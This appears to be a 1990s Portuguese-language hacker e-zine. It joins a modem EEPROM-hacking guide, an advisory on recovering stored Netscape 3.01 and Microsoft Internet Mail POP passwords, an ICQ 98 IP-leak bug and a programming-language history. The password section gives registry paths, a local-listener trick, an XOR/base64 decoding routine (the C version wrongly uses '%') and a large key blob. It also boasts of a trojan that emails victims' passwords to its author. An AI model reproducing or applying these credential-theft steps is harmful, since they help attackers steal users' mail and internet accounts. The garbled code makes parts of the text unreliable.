Os modems modelo Courier possuem algumas habilidades interessantes... Protocolo HST: Protocolo desenvolvido pra linhas telefônicas muito podres. Pra quem não consegue conectar com V.32bis ou que se conecta a 1200bps. Ele possibilita conexões de 16800 na linha mais podre possível (até com um modem 14.400).Protocolo ASL: Uma habilidade extremamente interessante dos Courier's da vida... Esse protocolo permite que, se você se conectar a uma velocidade mais baixa do que a máxima permitida pelo seu modem por motivos de ruídos na linha telefônica e, depois, a qualidade da linha melhorar, ele aumenta a velocidade sem perder a conecção atual.

Fast Retrains: Diminui o tempo que o modem leva pra sincronizar a sua velocidade com o outro modem que ele está falando... diminui dos 10 ou 15 segundos padrão pra 1 ou 2 segundos.

Ok... Beleza, me ensina então....

A tática consiste em resetar a RAM do modem e colocar lá os parâmetros para ele habilitar os protocolos do courier. Abra um programa de comunicações qqer (pode ser o Telix pra DOS, o HyperTerm pro Win95 ou qqer outro equivalente...) e digite o seguinte comando abaixo:

ATY14 <enter>

A resposta vai ser parecida com isso:

000,000,006,007,002,000 (óbvio que seus números serão diferentes...)

Bom, essas são as configurações atuais do seu modem... Eu aconselho que você anote isso num lugar seguro.... Alguns modems não funcionam mais depois que você tira a configuração original deles, então você pode precisar disso...

Bom, ótimo.

  • Os dois primeiros números da configuração do modem (neste caso o 000,006) não servem para absolutamente nada, ou seja, tah aih soh prá encher o nosso saco... hehehe... :)
  • O terceiro número é o q habilita a configuração do ASL... Eu recomendo que esse número seja 6.
  • O quarto número é o que muda os protocolos de FAX. Eu recomendo que seja 15 (todos os protocolos ligados).
  • O quinto número é o que habilita os V.xx's e o HST. Eu recomendo 15 novamente (tudo habilitado).
  • O sexto número é o código de país do seu modem... Parece besteira alterar isso mas não é... O código do Japão (1) permite uma discagem pulso extremamente rápida, o código Internacional (17) habilita o registro S39 para a alteração do volume do falantinho do modem, o código dos Estados Unidos (0) é o que melhor detecta sinal de ocupado.... Então, escolha você mesmo.

Bom digamos que você queira instalar todos os protocolos e usar o código de país dos Estados unidos. Então a sua configuração deve ficar exatamente assim:

000,000,006,015,015,000

Como proceder prá programar?

Chegou a parte mais divertida da operação... A técnica funciona tanto em modems internos como externos (óbvio, no interno é mó saco de fazer).Primeiro, desligue o modem, e se seu modem for interno, ranca fora por q vai ser necessário. Você terá que encontrar na placa do seu modem (se você tiver um modem externo eu aconselho que você o desmonte primeiro, tirando a capa de plástico dele) um chipzinho ridículo com menos de 1cm de comprimento, quatro perninhas em cima, quatro em baixo, com o código 93c66 ou 93/66... é extremamente pequeno e eu aconselho que você tenha uma boa lupa...


Pegue um prego, um pedaço de fio, uma chave de fenda, ou qualquer porcaria que seja condutor de eletricidade e junte a primeira perninha do chip com a segunda (a primeira é akela que tem uma bolinha em cima...) Num solda o prego pq depois do modem estiver ligado e o programa de comunicaçao estiver rodando, você vai precisar tirar esse curto da placa... Beleza. Coloca o modem no lugar (se for interno, óbvio) e entra no programa de comunicação. o primeiro comando a ser digitado deve ser o de Reset do modem:

ATZ <enter>

Beleza. Ranca fora o prego, fio ou equivalente que estava juntando o pino 1 e 2 do CI. Digita agora:

ATY14 <enter>

A resposta tem que ser exatamente assim:

,,,,,

Se a resposta for diferente disso, o curto no pino 1 e 2 não funcionou. Tira o modem de novo e encosta essas perninhas do jeito certo... :)

Se tudo correu na buena até agora, seu modem está pronto pra ser quase que totalmente reprogramado... Aí segue a lista dos comandos na ordem q deve ser digitada...

AT&L73=0 <enter> (Registrador nulo de configuração) 
AT&L67=0 <enter> (Registrador nulo de configuração)
AT&L31=6 <enter> (Registrador de ASL)
AT&L29=15 <enter> (Registrador de protocolos de FAX)
AT&L19=15 <enter> (Registrador de V.xx e HST)
AT&L14=0 <enter> (Código de país, escolha qqer um dos listados acima)

Todos estes comandos devem responder OK. Digite:

ATNX <enter>

Esse comandinho salva as configurações e recarrega os protocolos do modem. Ele não deve dar nenhuma resposta (nem OK)... Digite agora:

AT&F1&W <enter>

Seu modem deve responder OK. Se ele não responder, ele não suporta algum dos protocolos acima e vai ficar travado até você reconfigurá-lo... Veja no fim deste texto a parte de problemas. Se tudo funcionou bem, digite:

ATB1S34=8 <enter> (string de Courier)

e seja feliz com o seu novo modem!.... :)

Problemas

Algums modems mais novos, não possuem todos os protocolos no chipset e poderão "travar" com a nova configuração. Prá fazer ele voltar a funcionar, é simples:Desligue ele, junte as "perninhas" do 93/66 e ligue o modem de novo... E reprograme ele com as configurações originais.

EarthQuake

Crackeando o Netscape e os passwords do Microsoft Mail

Escrito por the.avatar e traduzido por BAT

Sistemas Afetados

Sistemas que rodam Netscape 3.01 Gold;
Sistemas que rodam o Microsoft Internet Mail 4.70x

Descrição

Crackear os passwords para estes mail clients é tão fácil quanto uma simples decodificação em MIME63!

Demonstração

:

NETSCAPE

O sistema de encriptação de password de E-mail é realmente fraco. Eu fui capaz de fazer uma cript-analyse em aproximadamente 20 minutos. Há dois métodos para quebrar uma senha: você precisa usar os métodos abaixo: O Non-Coder, e o Coderz.Eu só testei este método com meu (velho) Netscape Navigator 3.01 Gold, mas eu seguramente só trabalharia com NS2.0, até mesmo com versões de 16bit. Eu ainda estou investigando as de possibilidades de crackear essas versões mais antigas.

!!!E para esses que pensam o Internet Explorer está mais seguro!!!
!!!Leiam a última seção!!!

A senha pode ser achada no registro na seguinte string:

HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\Mail\POP Password

Sobre a encriptação:

A encriptação é finalizada deste modo:

  1. passe a senha por uma chave de XOR (encriptada nesse documento);
  2. Codifique usando MIME .

Para Decodificar, você simplesmente precisa reverter a operação (realmente!;)

Método Non-Coder

Material necessário:

  • Netscape Navigator instalado em seu computador
  • Um Port listener/dumper
  • Um password!

O que fazer:

  • Vá ao registro. Sete o POP Password para o password que você deseja hackear.
  • Ainda no registro, sete o POP Server para 127.0.0.1
  • (HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\Services\POP_Server)
  • Starte seu port listener/dumper na porta 110 (POP3)
  • Vá em Netscape e clique em "Get Mail"
  • Retorne a seu port listener. Uma vez que você esteja conectado, aparecerá um "+ok" ou coisa parecida (VC DEVE SABER QUANDO ESTÁ OU NÃO CONECTADO!!! SE VIRA), seguido da seguinte msg: "pass xxxxxxxx " (onde xxxxxxx será o password decriptado!)

Método Coderz

  • Material necessário:

    • seu de programa de linguagem favorito (eu proponho o qbasic ;)
    • Um decodificador MIME64
    • Um password!

    Eis o que fazer:

    • Decodifique o password como uma string de MIME64;
    • Quebre o password com a string encriptada MIME64 encontrada no fim desse documento.

    E você terá o pequeno password...
    P.S.: A chave no término do documento deve ser "XOR 48" para ser válida. Eu tenho digitado o password como " 0000000000000... " eu estou muito preguiçoso para remover esta máscara..;)
    Assim a rotina de decryptação faria algo como:for (c=0;pass[c] != '\0'; c++) pass[c] = pass[c] % netscapekey[c];
    ou
    for c := 1 to length(pass) do pass[c] := char(byte(pass[c]) XOR netscapekey[c]);

    O que fazer com aquela besteira toda?

    Eu codifiquei um protótipo de "trojan portscanner" que me envia o password do usuário por E-mail quando ele roda o programa, e trabalha muito bem! As possibilidades são quase infinitas! A maioria das Contas de E-mail são contas da Internet também, então imagine o que um hacker com espirito de porco poderia fazer!

    Microsoft? Mais seguro?

    Se você é um usuário viciado da Microsoft, olhe isto: Para hackear o password do Microsoft Mail é quase a mesma coisa que com o Netscape, exceto que qualquer pessoa pode fazer isto com um decodificador MIME64! O Microsoft Mail guarda o password assim no registro:HKEY_CURRENT_USER\Software\Microsoft\Internet Mail and News\Mail\POP3

    Há uma sub-chave criada neste caminho, com o nome da conta POP3. Por exemplo, se eu pusesse "localhost " como POP server, eu teria:

    HKEY_CURRENT_USER\Software\...\Mail\POP3\localhost

    E neste caminho, nós teremos uma entrada chamada password. Salve o valor desta password em um arquivo, então decodifique isto com MIME64. Você tem seu password!!!

    Os desenvolvedores da Microsoft são mais preguiçosos que os da Netscape. Eles nem mesmo codificam decentemente os passwords no registro.

    As Pessoas dizem: " A Internet está segura ".

    Eu digo: " Internet será insegura por... muito tempo "!

    " Aproveitem o desenvolvimento profissional, amigos "!

    -the.avatar

    MIME64 ENCODED STRING:

      Content-Type: text/plain; charset=US-ASCII; name=netscape.key 
    Content-transfer-encoding: base64
    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
    7ukqjLZE8gmVuDcdtSMArckyQK39J4roGzUgDLQg/VM5+9xIdpZ0WElbUUgn
    0CXAFdS5kaHgBOro5vrTpyM/Mzgn4DIPkQXARBbLVIzQJtO/P3VyXCQ7cvvA
    ALZI9mGQR2uy/g0ruESUMxEpDb/IqoOgx1wgo8GRgENX6dEu23JKiQUn3MtZ
    9y5LBTIgeKF54468wTeIz+wUWObx3IzBRmEdcD6+wb72GJOLsSHk+p6A8tCs
    049eCiJwnDqnsOb92713P/DFnjGTibtyL8V2kaRapwmzfetlsoVM70j3Yilh
    jJY7mD6h8nxzZqQWb+Dqe1fpbK6STXsDgvQTyj+TFGps3aR8e8MuORJvo8p2
    AGK5orTzpKVgUx5ZkDdZ1dyJar7+YWfzCGfaezz3yWH7fDI1zJsqmHa7Ouv8
    xeB8SpOy5i4cvIfkC6cH9IbGtQqT80vuRPj7+6CHeoQfVwqPcfzz3/57KcNn
    658Xa7T/8BuLNGKiO7Gc2w6oyb/udErpbFu170oj2EKHef+oYt4WSRgvHKTw
    g70Z37fRvhupREjJqe+1ZcZNeKRaaqSQ6opgcbKACtx2eHNeWm3MGuHHVUnW
    i8cCt3XUymVoQIAhPfMswL5FHVs4+RvUB6alTGlER2NvvKm0JAR+kf2zeRsP
    CG1Lv+8wy4eGFS6uNMZCZ7iPlhxs+3EDpIvJhRPv/D12UaBqsT4es4WvujBw
    nsLxoBeLdWsd706kqms4yclkD5epm52qC/h1rsIe9FbxvB3m2hVpqHYXlZYs
    gexoMPql7MYrQzKrPOBv3D4lbUOAFIkxHJ6GwyknKw6fujLQEukZC0B2unKS
    +yF2Sl3QxbqLT+QjW4G/JfE/HdMPwPcfJuJMX43ZEHnEgoGXuadbZSvoV4ka
    92ARtOpQd3sGLEL1VFHS6Zd2Qy99ASqiZyTAlN8yOPoINGhyMIxFcKKyAtiV
    1Sa6YBEjw6l6P2I9WeXYbGt9GBtLHZznrbYKCtqjtnoF3G3WCTvBSJyg6Z5x
    FLzOCWSgl9EjYS7Ge3j0q3mJFv7Nf2g14gClLACjkQvw6XHXDnD0IvV6el/V
    p8IScZqNeL29DpVVostSpKbiopwYEmn0kpB5bvF+L2JhvNW49Ynuo/le0pND
    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
    QiiVO9ZGx3fC4w==

    A Resposta da Microsoft é desconhecida até este momento.

    ICQ Bug

    O ICQ 98 tem uma opção para não mostrar seu próprio IP no seu info. Porém, há um bug q permite que você possa ver os IP não autorizados:

    1. O user tem que estar na sua lista, e lógicamente conectado.
    2. Fique offline.
    3. Agora, basta acessar o info da pessoa, porque com certeza vai haver o endereço IP dela lá, como se a opção de esconder IP não existisse... fácil né?

    Lufe (lufe@iname.com)

    Linguagens de Programação

    Quando surgiu o primeiro computador eletrônico programável, o ENIAC – Eletronic Numerical Integrator And Calculator -, não existia nenhum software que facilitasse a vida do programador. Para programá-lo, era necessário que este conhecesse o sistema binário, as instruções do processador (linguagem de máquina) e a arquitetura do computador, além de ser obrigatória a entrada do programa por meio de chaves do tipo liga/desliga.

    No início, as tarefas hoje executadas pelos sistemas operacionais, tais como inicialização do computador e alocação de memória tinham que também ser implementadas.

    A linguagem de máquina foi rapidamente substituída pela linguagem de montagem (assembly) que contém as mesmas instruções da máquina, mas representadas por códigos simbólicos denominados mneumônicos. A vantagem disso é que os programas não eram mais codificados por sequências de números, mas sim por símbolos.

    Ao mesmo tempo em que a linguagem de montagem facilitou a criação e manutenção de programas, ela fez com que os programas criados somente eram executados em máquinas que possuíssem o mesmo processador e sistema operacional.

    Apesar da dificuldade, até hoje as linguagens de montagem são utilizadas, principalmente para a criação de softwares básicos. Como linguagem de montagem temos a linguagem Assembler.

    Vamos seguir a evolução das linguagens:

    1956:

    FORTRAN –Abreviação de Formula Translator. É a linguagem mais antiga, muito utilizada ainda hoje, na ciência, engenharia e desenvolvimento de software.

    1960:

    COBOL -(Common Business Oriented Language, ou seja, Linguagem Orientada a Negócios Comuns)

    Foi idealizada para aplicações comerciais, onde se manipulam grandes arquivos de dados. Possui a maior biblioteca de sub-programas ou rotinas auxiliares no desenvolvimento de sistemas no mundo inteiro. Estima-se que para converter toda essa base de programas para outra linguagem de auto nível, seria necessário em torno de 10% do PIB americano. Aí você pergunta. e daí ? É mesmo, quem seria o louco de fazer isso...

    Somente há pouco tempo atrás surgiu o Cobol para microcomputador. A MicroSoft é que realizou este feito.

    ALGOL – Abreviação de Algorithimic language. Uma notação algébrica completa para solucionar problemas lógicos por meio de algoritmos.

    LISP – Abreviação de List processor. trabalha com listas de dados numéricos. Utilizada em simulação, análise linguística e inteligência artificial. A linguagem LISp, também é utilizada em rotinas de software gráfico para gerenciamento de suas matrizes de projetos.

    1964:

    PL/1– Abreviação de Programming Language 1. Derivada diretamente da Cobol e muito semelhante a esta na manipulação de arquivos, utiliza recursos matemáticos do FORTRAN.

    Basic -Beginners All-purpose Symbolic Instruction Code-O Basic foi desenvolvido no DartMouth College, em 1964, por John Kemeny e Thomas Kurtz, que reconheceram a necessidade de se criar uma linguagem de computação genérica, adequada a programadores iniciantes cujos conhecimentos profissionais fossem heterogêneos.

    1967

    APL – A Programming language. Favorita de matemáticos e estatísticos devido a seus poderosos operadores, que substituem dezenas de instruções de outras linguagens.

    1968

    ALGOL 68 – Versão gigante e poderosa da ALGOL definida por uma comissão européia de cientistas.

    1969:

    BCPL – Abreviação de Basic Combined Programming Language. Linguagem que alia a estrutura da ALGOL ao poder de acesso à máquina propiciado pela ASSEMBLER.

    1970:

    PROLOG – Abreviação de Programming Logic. Manipula afirmações lógicas. Utilizada nas pesquisas de inteligência artificial, foi escolhida no Japão, para o desenvolvimento da 5ª geração de computadores. Deriva diretamente da ALGOL.

    1971:

    PASCAL – Alguns atribuem o início da linguagem em 1968. Nome decorrente da homenagem a Pascal, é uma linguagem simples que exige sólida estruturação lógica dos programas. Diversas versões derivaram da primeira:

    Pascal concorrente – em 1975, versão ampliada para multiprogramação.

    Pascal UCSD – em 1977, versão ampliada para sistemas

    Pascal ISO – De 1980 a 1982 – Versão padronizada, internacionalmente.

    A estrutura da linguagem se parece um pouco com a linguagem C. A diferença é que Pascal é uma linguagem mais de alto nível e menos flexível. Para exemplificar isso, vamos supor que queremos incrementar um número i ;

    Pascal:
    i:= i + 1
    INC(i)

    C++
    i=i+1


    ++i ( Pré-incremento)
    i++ (Pós incremento)

    i+=1

    Sacou a diferença ? Isso se aplica também as facilidades que o C tem para o gerenciamento de memória. Mas isso não quer dizer que o Pascal não é utilizado, para a maioria das aplicações ele é uma solução eficiente, às vezes, até mais do que o C.


    1975:

    FORTH – Deriva diretamente da FORTRAN, foi utilizada no desenvolvimento de softwares e aplicativos, para programas de rápida execução e economia de memória.

    1978:

    A linguagem C -É uma linguagem de programação de finalidade geral que permite economia de expressão, modernos fluxos de controle e estruturas de dados e um rico conjunto de operadores.

    Seu desenvolvimento se iniciou por volta de 1974.

    C foi originalmente projetada para ser implementada no sistema operacional UNIX no PDP-11 da DEC, por Dennis Ritchie e Brian W. Kernighan. Na realidade C é o resultado do processo de desenvolvimento iniciado com outra linguagem , chamada BCPL, desenvolvida por Martin Richards. Esta linguagem influenciou a linguagem inventada por ken Thompson, chamada B, a qual levou o desenvolvimento da linguagem C.

    Ela pode ser utilizada por exemplo para criar um sistema operacional (como já foi utilizada no Unix, OS/2...), processadores de texto, banco de dados e sistemas aplicativos em geral.

    1980:

    LOGO – Projetada para crianças, desenvolve o raciocínio lógico, a habilidade de resolver problemas e o gosto pela matemática e computação. Derivada diretamente da linguagem LISP.

    MODULA 2– Voltada para o desenvolvimento de sistemas, baseia-se em módulos independentes.

    1982:

    ADA – Estremamente poderosa, foi adotada pelo departamento de defesa dos EUA para todos os projetos e contratos governamentais.

    1986:

    Clipper -A primeira versão que eu ouvi falar foi a Clipper autumn. Depois surgiu o Clipper summer 87 e assim que começou.Eu nunca vi uma linguagem tão fácil na minha vida. Graças a essa linguagem que eu consegui o meu primeiro emprego. Ela é uma linguagem de alto nível pouco flexivel, a não ser que você gere bibliotecas em C em conjunto com o Clipper. Essa linguagem causa sérios problemas na sua execução devido aos executáveis serem muito grandes. Muitas vezes não tem memória convencional suficiente, daí já sabe, abre autoexec.bat e config.sys, altera a variável de ambiente (SET CLIPPER = E999),etc...

    Como dizem por aí: a primeira linguagem agente nunca esquece.

    Mas se voce nunca fez nenhum programa sequer, não custa nada tentar...Se voce nunca conseguiu programar, não se preocupe ! Com Clipper até sua vó programa. ehehehe

    Prá Finalizar

    Bom existem muitas outras linguagens, umas mais mediocres outras menos: Dataflex(mais conhecido como Cacaflex) e muito outros...

    Para terminar vou falar um pouco de Windows( bleeehhh). Com o surgimento do Windows, não sei se felizmente ou infelizmente mas não vamos entrar no mérito da questão, houve uma revolução na maneira de se fazer programas. O que antes seguia uma lógica sequencial(faça isso depois aquilo), se transformou em uma lógica mais distribuída orientada a eventos. Isso significa, se o usuário mexer aqui, faça isso ou se ele apertar aqui faça aquilo outro e assim por diante. Mesmo porque o Windows trouxe o ambiente gráfico junto com ele(mesmo já existindo um ambiente gráfico muito melhor há muito tempo no System, o S.O. das máquinas Macintosh), para os PC’s que só conheciam o DOS era o máximo.

    A partir daí, começaram a surgir derivações de diversas linguagens para Windows, como o Visual Basic, o Visual C++, o Delphi do Pascal, Visual Cobol, etc...Também surgiram outras menos conhecidas como Powerbuilder, SQL Windows...

    Hoje a grande vantagem de se programar é que existe o conceito de programação orientada a objetos (POO). Simplificando, pode-se dizer que isso ajuda muito na reutilização do que você já fez, na manutenção dos programas, na rapidez de desenvolvimento e produtividade, no melhor relacionamento dos dados e estruturas do programa, e muitas outras coisas que se eu começar a falar demais ningúem vai ler a matéria. ehehe..

    []’s

    Jabahanks

    REFORMA AGRARIA NO AR

